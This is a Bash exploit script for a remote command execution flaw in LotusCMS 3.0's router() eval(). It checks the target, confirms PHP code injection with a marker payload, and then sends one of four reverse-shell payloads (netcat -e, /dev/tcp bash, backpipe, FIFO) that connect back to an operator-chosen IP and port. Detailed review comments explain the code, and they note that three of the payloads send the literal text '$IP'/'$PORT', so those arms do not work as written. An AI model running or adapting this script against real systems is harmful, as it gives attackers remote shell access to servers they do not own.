#!/bin/bash
# Lotus CMS 3.0 eval() Remote Command Execution Exploit
# flaw in router() function, original write-up: http://secunia.com/secunia_research/2011-21/
# Scripted in Bash by HR
# USAGE: ./lotusRCE.sh target lotusCMS-path
# USAGE: ./lotusRCE.sh ki0ptrix3.com /
# USAGE: ./lotusRCE.sh 192.168.1.36 /lcms/
# Enter IP and PORT when asked to spawn netcat based reverse shell ;)
#Start the magic
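target="$1" #Target site, ex: 192.168.1.36 or ki0ptrix3.com (no http://)
path="$2" # Path to LotusCMS, ex: /lcms/ or /
junk=/tmp
# Scratch files for curl output. The mktemp calls are checked so a failure
# (e.g. unwritable $junk) stops here instead of leaving both variables empty
# and letting later `curl -o` / `rm` run against an empty path. Eight X's
# rather than three so the names in the shared temp directory are not
# guessable by other local users.
storage1=$(mktemp "$junk/lotusRCE1.XXXXXXXX") || { echo "mktemp failed in $junk" >&2; exit 1; }
storage2=$(mktemp "$junk/lotusRCE2.XXXXXXXX") || { rm -f -- "$storage1"; echo "mktemp failed in $junk" >&2; exit 1; }
#First a simple Bashtrap function to handle interrupt (CTRL+C)
# bashtrap() is defined further down; bash looks the handler up when the
# signal actually arrives, so registering it before the definition is fine.
trap bashtrap INT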
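#######################################
# SIGINT handler (registered with `trap bashtrap INT`): announce the
# interrupt, delete the two scratch files and terminate the whole script.
# Globals: storage1, storage2 (read; the files they name are removed)
# Outputs: a two-line gap and the shutdown message on stdout
# Exits:   0, always
#######################################
bashtrap(){
  echo
  echo
  echo 'CTRL+C has been detected!.....shutting down now' | grep --color '.....shutting down now'
  # These are regular files, never directories, so -r is not needed; the
  # `--` guard keeps an odd value from being parsed as an rm option, and the
  # -n check skips the call entirely when a variable was never set.
  [ -n "$storage1" ] && rm -f -- "$storage1"
  [ -n "$storage2" ] && rm -f -- "$storage2"
  #exit entire script if called
  exit 0
}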
#End bashtrap()
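#######################################
# Probe the target for a LotusCMS front page before sending any payload.
# Issues a HEAD request for index.php?page=index; on HTTP 200 hands over
# to vuln_check, otherwise reports and exits non-zero.
# Globals: target, path (read, used verbatim — with no scheme in $target
#          curl defaults to plaintext http://), storage1 (raw response
#          headers are written here)
# Outputs: progress text on stdout
# Exits:   1 when the page is unreachable or does not answer 200
#######################################
page_exists(){
  local pageused
  # -w '%{http_code}' yields the status on its own ("000" when the
  # connection fails), instead of slicing the first header line with
  # sed '2,20d' | cut — which broke as soon as a response carried more than
  # twenty header lines. -s keeps curl quiet; the headers still land in
  # storage1 so a failed probe can be inspected.
  pageused=$(curl -s -I -o "$storage1" -w '%{http_code}' "$target$path/index.php?page=index")
  if [ "$pageused" = '200' ]; then
    echo
    echo "Path found, now to check for vuln...." | grep --color -E 'Path found||now to check for vuln'
    echo
    vuln_check
  else
    echo "Provided site and path not found, sorry...."
    exit 1
  fi
}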
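#######################################
# Confirm the eval() injection: POST a payload that makes the vulnerable
# router() print a fixed marker, then look for that marker in the body.
# Decoded payload:  page=index');${print('Hood3dRob1n')};#
# Globals: target, path (read), storage1 (response body written here)
# Outputs: progress text on stdout; on a hit calls exploit_funk
# Exits:   1 when the marker is not found in the response
# Caveat:  the marker is also part of the request, so an application that
#          reflects the `page` parameter back verbatim would match here
#          without executing anything — treat a hit as strong, not proof.
#######################################
vuln_check(){
  # URL quoted so a path with shell-special characters is not word-split or
  # globbed; -s replaces the bare 2>/dev/null and silences the progress bar.
  curl -s "$target$path/index.php" --data "page=index%27%29%3B%24%7Bprint%28%27Hood3dRob1n%27%29%7D%3B%23" -o "$storage1"
  # -q: only the exit status matters here; without it grep would also dump
  # the matching HTML line onto the terminal.
  if grep -q 'Hood3dRob1n' "$storage1" 2>/dev/null; then
    echo "Regex found, site is vulnerable to PHP Code Injection!" | grep --color -i -E 'Regex found||site is vulnerable to PHP Code Injection'
    echo
    exploit_funk
  else
    echo "Unable to find injection in returned results, sorry...."
    exit 1
  fi
}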
#######################################
# Interactive reverse-shell stage, reached only after vuln_check matched.
# Reads a listener IP and port from stdin, then shows a `select` menu; every
# arm except "Exit" POSTs one system() payload through the same eval() sink
# and drops back to the menu. The loop ends only on "Exit" (which calls
# exit) or on EOF on stdin (which returns to the caller).
# Globals: target, path (read; expanded unquoted in every curl call, so
#          they are subject to word-splitting and globbing)
# Inputs:  IP, PORT from stdin — read without -r and not validated, so they
#          are spliced into the request body exactly as typed
#######################################
exploit_funk(){
# Vuln confirmed, time to exploit shall we ;)
echo "About to try and inject reverse shell...." | grep --color 'About to try and inject reverse shell'
echo "what IP to use?"
read IP
echo "What PORT?"
read PORT
echo
echo "OK, open your local listener and choose the method for back connect: " | grep --color -E 'OK||open your local listener and choose the method for back connect'
select reverse_options in "NetCat -e" "NetCat /dev/tcp" "NetCat Backpipe" "NetCat FIFO" "Exit"
do
case $reverse_options in
"NetCat -e")
# Decodes to: page=index');${system('nc -e /bin/sh $IP $PORT')};#"
# $IP and $PORT are bare here, so the local shell substitutes the values
# read above. The trailing %22 (") sits after the PHP '#' and is commented
# out on the server side.
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27nc%20-e%20%2fbin%2fsh%20$IP%20$PORT%27%29%7D%3B%23%22" 2> /dev/null
;;
"NetCat /dev/tcp")
# Decodes to: /bin/bash -i > /dev/tcp/$IP/$PORT 0<&1 2>&1
# NOTE(review): %24IP / %24PORT are the literal characters "$IP" / "$PORT"
# — unlike the arm above, the values read from stdin are NOT interpolated
# into this request body.
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27%2fbin%2fbash%20-i%20%3E%20%2fdev%2ftcp%2f%24IP%2f%24PORT%200%3C%261%202%3E%261%27%29%7D%3B%23" 2> /dev/null
;;
"NetCat Backpipe")
# Decodes to: mknod backpipe p && nc $IP $PORT 0<backpipe | /bin/bash 1>backpipe
# NOTE(review): same literal %24IP / %24PORT as the /dev/tcp arm.
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27mknod%20backpipe%20p%20%26%26%20nc%20%24IP%20%24PORT%200%3Cbackpipe%20%7C%20%2fbin%2fbash%201%3Ebackpipe%27%29%7D%3B%23" 2> /dev/null
;;
"NetCat FIFO")
# Decodes to: mkfifo /tmp/foo && cat /tmp/foo | /bin/sh -i 2>&1 | nc $IP $PORT > /tmp/foo
# NOTE(review): same literal %24IP / %24PORT as the /dev/tcp arm.
curl $target$path/index.php --data "page=index%27%29%3B%24%7Bsystem%28%27mkfifo%20%2ftmp%2ffoo%20%26%26%20cat%20%2ftmp%2ffoo%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20%24IP%20%24PORT%20%3E%20%2ftmp%2ffoo%27%29%7D%3B%23" 2> /dev/null
;;
"Exit")
# Leaves the script directly; the scratch files created at the top are not
# removed on this path (only the INT handler and the end of MAIN clean up).
echo "got r00t?"
exit;
;;
esac
done
}
#MAIN
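# Entry point: usage check, then probe -> verify -> exploit.
# Remove the scratch files on every exit path — the --help exit below, the
# failure exits inside page_exists/vuln_check, the "Exit" menu arm in
# exploit_funk and the INT handler's exit 0 all go through this trap.
# Trailing rm lines alone only ran on a normal fall-through.
trap 'rm -f -- "$storage1" "$storage2"' EXIT
clear
# Only the target is mandatory; an empty path still produces "$target/index.php".
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ]; then
  echo
  echo "USAGE: $0 target LotusCMS_path" | grep --color 'USAGE'
  echo "EX: $0 192.168.1.36 /lcms/" | grep --color 'EX'
  echo "EX: $0 ki0ptrix3.com /" | grep --color 'EX'
  echo
  exit 0
fi
page_exists
# Reached only when exploit_funk's select loop returns (EOF on stdin); the
# EXIT trap above performs the cleanup.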
#EOF